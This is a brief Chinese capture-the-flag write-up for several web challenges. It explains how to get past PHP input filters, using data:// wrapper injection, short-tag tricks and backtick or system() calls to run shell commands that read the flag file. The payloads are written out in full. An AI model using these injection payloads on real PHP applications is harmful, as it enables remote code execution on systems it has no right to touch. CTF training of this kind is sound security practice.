web41
这个题过滤了$、+、-、^、~使得异或自增和取反构造字符都无法使用，同时过滤了字母和数字。但是特意留了个或运算符|。
我们可以尝试从ascii为0-255的字符中，找到或运算能得到我们可用的字符的字符。

web 37
考察data伪协议，data伪协议需满足allow_url_fopen，allow_url_include同时开启才能使用。
payload：
1
/?c=data://text/plain,<?php system("cat fl*");?>

web38
php被过滤了，可以用短标签绕过php。
短标签：比更灵活调用的方法
paylaod：
1
2
?c=data://text/plain,<?=`cat fla*`;?>
/?c=data://text/plain,<?=system("cat fl*");?>

web29
过滤了flag，可以用system,echo等.
1
2
/?c=system("cat fla*");
/?c=echo`cat fl*`;

web30
多过滤了一个system，还可以用echo.
1
/?echo`cat fl*`;